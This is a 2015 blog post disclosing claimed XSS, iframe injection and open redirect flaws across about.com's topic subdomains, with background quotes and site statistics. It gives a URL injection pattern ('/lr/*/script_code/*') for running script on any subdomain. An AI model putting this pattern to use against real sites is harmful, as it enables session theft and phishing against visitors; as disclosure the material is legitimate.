<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<br class="Apple-interchange-newline" /></div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-6322800700334987667.post-12044455305214429332015-06-06T04:14:00.000-07:002015-06-06T04:22:35.866-07:00About Group (about.com) All Topics (At least 99.88% links) Vulnerable to XSS & Iframe Injection Security Attacks, About.com Open Redirect Web Security Vulnerabilities<div>
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">About Group (about.com) All Topics (At least 99.88% links) Vulnerable to XSS & Iframe Injection Security Attacks, About.com Open Redirect Security Vulnerabilities</span></b></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">Vulnerability Description:</span></b></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">About.com all "topic sites" are vulnerable to XSS (Cross-Site Scripting) and Iframe Injection (Cross Frame Scripting) attacks. This means all sub-domains of about.com are affected. Based on a self-written program, 94357 links were tested. Only 118 links do not belong to the topics (Metasites) links. Meanwhile, some about.com main pages are vulnerable to XSS attack, too. This means no more than 0.125% links are not affected. At least 99.875% links of About Group are vulnerable to XSS and Iframe Injection attacks. In fact, for about.com's structure, the main domain is something just like a cover. So, very few links belong to them.</span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Simultaneously, the About.com main page's search field is vulnerable to XSS attacks, too. This means all domains related to about.com are vulnerable to XSS attacks.</span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">For the Iframe Injection vulnerability. They can be used to do DDOS (Distributed Denial-of-Service Attack) to other websites, too.</span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Here is one example of DDOS based on Iframe Injection attacks of others.</span></div>
<div style="margin: 0px;">
<a href="http://www.incapsula.com/blog/world-largest-site-xss-ddos-zombies.html" style="line-height: 25.5px;" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://www.incapsula.com/blog/<wbr></wbr>world-largest-site-xss-ddos-<wbr></wbr>zombies.html</span></a></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">In the last, some "Open Redirect" vulnerabilities related to about.com are introduced. There may be large number of other Open Redirect Vulnerabilities not detected. Since About.com are trusted by some the other websites. Those vulnerabilities can be used to do "Covert Redirect" to these websites.</span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">Vulnerability Disclosure:</span></b></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Those vulnerabilities were reported to About on Sunday, Oct 19, 2014. No one replied. Until now, they are still unpatched.</span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div class="separator" style="clear: both; margin: 0px; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhXeoxH4tQ-8G1_o-AQtFU7m4kBBUhtU9xD5MpqXutELVovsDxBOq9e-uSNRSUn06WFYMUGu3j9erBdFCW9hmkzmlQFoOnVP92JE6GXS2epWelUi9Qe_3jdOyC8rc8NgvkgKsQdssZytKs/s1600/about_quesion_security_xss1.jpg" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><span style="clear: left; color: black; float: left; font-family: Arial, Helvetica, sans-serif; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="181" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhXeoxH4tQ-8G1_o-AQtFU7m4kBBUhtU9xD5MpqXutELVovsDxBOq9e-uSNRSUn06WFYMUGu3j9erBdFCW9hmkzmlQFoOnVP92JE6GXS2epWelUi9Qe_3jdOyC8rc8NgvkgKsQdssZytKs/s400/about_quesion_security_xss1.jpg" style="cursor: move;" width="400" /></span></a></div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div>
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b></div>
</div>
<div>
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b></div>
</div>
<div>
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b></div>
</div>
<div>
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b></div>
</div>
<div>
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b></div>
</div>
<div>
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b></div>
</div>
<div>
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b></div>
</div>
<div>
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b></div>
</div>
<div>
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b></div>
</div>
<div>
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b></div>
</div>
<div>
<div style="margin: 0px;">
<br /></div>
</div>
<div>
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b></div>
</div>
<div>
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b></div>
</div>
<div>
<div>
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b></div>
</div>
<div>
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">Vulnerability Discover:</span></b></div>
</div>
</div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Jing Wang, Division of Mathematical Sciences (MAS), School of Physical and Mathematical Sciences (SPMS), Nanyang Technological University (NTU), Singapore. (<a href="https://twitter.com/justqdjing/status/562252555149791233">@Justqdjing</a>)</span></div>
</div>
<div>
<div style="margin: 0px;">
<a href="http://www.tetraph.com/wangjing"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://www.tetraph.com/<wbr></wbr>wangjing</span></a></div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<br /></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">(1) Some Basic Background</span></b></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">(1.1) Domain Description:</span></b></div>
</div>
<div>
<div>
<div style="margin: 0px;">
<a href="http://www.about.com/" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://www.about.com/</span></a></div>
</div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://www.alexa.com/siteinfo/about.com">http://www.alexa.com/siteinfo/about.com</a></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">"For March 2014, 61,428,000 unique visitors were registered by comScore for About.com, making it the 16th-most-visited online property for that month." (The New York Times)</span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">"About.com, also known as The About Group (formerly About Inc.), is an Internet-based network of content that publishes articles and videos about various subjects on its "topic sites," of which there are nearly 1,000. The website competes with other online resource sites and encyclopedias, including those of the Wikimedia Foundation, and, for March 2014, 61,428,000 unique visitors were registered by comScore for About.com, making it the 16th-most-visited online property for that month. As of August 2012, About.com is the property of IAC, owner of Ask.com and numerous other online brands, and its revenue is generated by advertising." (Wikipedia)</span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">"As of May 2013, About.com was receiving about 84 million unique monthly visitors." (TechCrunch. AOL Inc.)</span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">"According to About's online media kit, nearly 1,000 "Experts" (freelance writers) contribute to the site by writing on various topics, including healthcare and travel." (About.com)</span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">(1.2) Topics Related to About.com</span></b></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">"The Revolutionary About.com Directory and Community Metasite. Hundreds of real live passionate Guides covering Arts, Entertainment, Business, Industry, Science, Technology, Culture, Health, Fitness, Games,Travel, News, Careers, Jobs, Sports, Recreation, Parenting, Kids, Teens, Moms, Education, Computers, Hobbies and Local Information." (<a href="http://azlist.about.com/" target="_blank">azlist.about.com</a>)</span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">About.com - Sites A to Z </span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Number of Topics</span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">A: 66</span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">B: 61</span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">C: 118</span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">D: 49</span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">E: 33</span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">F: 57</span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">G: 39</span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">H: 48</span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">I: 32</span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">J: 15</span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">K: 13</span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">L: 36</span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">M: 70</span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">N: 26</span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">O: 23</span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">P: 91</span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Q: 4</span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">R: 32</span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">S: 104</span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">T: 47</span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">U: 12</span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">V: 9</span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">W: 43</span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">X: 1</span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Y: 4</span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Z: 1</span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">SUM: 1039</span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Reference:</span></div>
</div>
<div>
<div style="margin: 0px;">
<a href="http://azlist.about.com/" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">azlist.about.com/</span></a></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">In fact, those are not all topics of about.com. Some of the topics are not listed here such as,</span></div>
</div>
<div>
<div style="margin: 0px;">
<a href="http://specialchildren.about.com/" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://specialchildren.about.<wbr></wbr>com</span></a></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">So, there are more than 1000 topics related to about.com.</span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">(1.3) Result of Exploiting XSS Attacks</span></b></div>
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b><span style="font-family: Arial, Helvetica, sans-serif;">XSS may allow a remote attacker to create a specially crafted request that would execute arbitrary script code in a user's browser session within the trust relationship between their browser and the server. </span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;">Base on Acunetix, exploited XSS is commonly used to achieve the following malicious results:</span></div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"> "Identity theft</span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"> Accessing sensitive or restricted information</span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"> Gaining free access to otherwise paid for content</span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"> Spying on user’s web browsing habits</span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"> Altering browser functionality</span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"> Public defamation of an individual or corporation</span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"> Web application defacement</span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"> Denial of Service attacks (DOS)</span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">" (Acunetix)</span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">(1.4) Basics of Iframe Injection (Cross-frame-Scripting) Vulnerabilities</span></b></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">"In an XFS (Cross-frame-Scripting) attack, the attacker exploits a specific cross-frame-scripting bug in a web browser to access private data on a third-party website. The attacker induces the browser user to navigate to a web page the attacker controls; the attacker's page loads a third-party page in an HTML frame; and then JavaScript executing in the attacker's page steals data from the third-party page." (OWASP)</span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">"XFS also sometimes is used to describe an XSS attack which uses an HTML frame in the attack. For example, an attacker might exploit a Cross Site Scripting Flaw to inject a frame into a third-party web page; or an attacker might create a page which uses a frame to load a third-party page with an XSS flaw." (OWASP)</span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">(1.5) Basic of Open Redirect (Dest Redirect Privilege Escalation) Vulnerabilities</span></b></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">"An open redirect is an application that takes a parameter and redirects a user to the parameter value without any validation. This vulnerability is used in phishing attacks to get users to visit malicious sites without realizing it." (OWASP)</span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Open redirect is listed in OWASP top 10. The general consensus of it is "avoiding such flaws is extremely important, as they are a favorite target of phishers trying to gain the user's trust."</span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Several other similar products 0-day vulnerabilities have been found by some other bug hunter researchers before. CNN has patched some of them. "The Full Disclosure mailing list is a public forum for detailed discussion of vulnerabilities and exploitation techniques, as well as tools, papers, news, and events of interest to the community. FD differs from other security lists in its open nature and support for researchers' right to decide how to disclose their own discovered bugs. The full disclosure movement has been credited with forcing vendors to better secure their products and to publicly acknowledge and fix flaws rather than hide them. Vendor legal intimidation and censorship attempts are not tolerated here!" A great many of the following web securities have been published here, Injection, Broken Authentication and Session Management, Cross-Site Scripting (XSS), Insecure Direct Object References, Security Misconfiguration, Sensitive Data Exposure, Missing Function Level Access Control, Cross-Site Request Forgery (CSRF), Using Components with Known Vulnerabilities, Unvalidated Redirects and Forwards. It also publishes suggestions, advisories, solutions details related to XSS and URL Redirection vulnerabilities and cyber intelligence recommendations.</span></div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">(2) About Group About.com All Topics (At least 99.88% links) Vulnerable to XSS (Cross-Site Scripting) Security Attacks</span></b></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Domain:</span></div>
</div>
<div>
<div style="margin: 0px;">
<a href="http://www.about.com/" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://www.about.com/</span></a></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">Vulnerability description:</span></b></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">A method was found to attack users of About.com based XSS attacks. </span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">All links under the topics of about.com can be used for this attack.</span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Just attach "/lr/" to any About.com's sub-domains. Then attach "any codes + sciript" or attach "script" code directly is OK. The structure is "<a href="http://subdomain.about.com/lr/*/script_code/*">http://subdomain.about.com/<wbr></wbr>lr/*/script_code/*</a>".</span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">The vulnerability can be attacked without user login. Tests were performed on Mozilla Firefox (26.0) in Ubuntu (14.04) and Microsoft IE (9.0.15) in Windows 7.</span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; margin: 0px; text-align: center;">
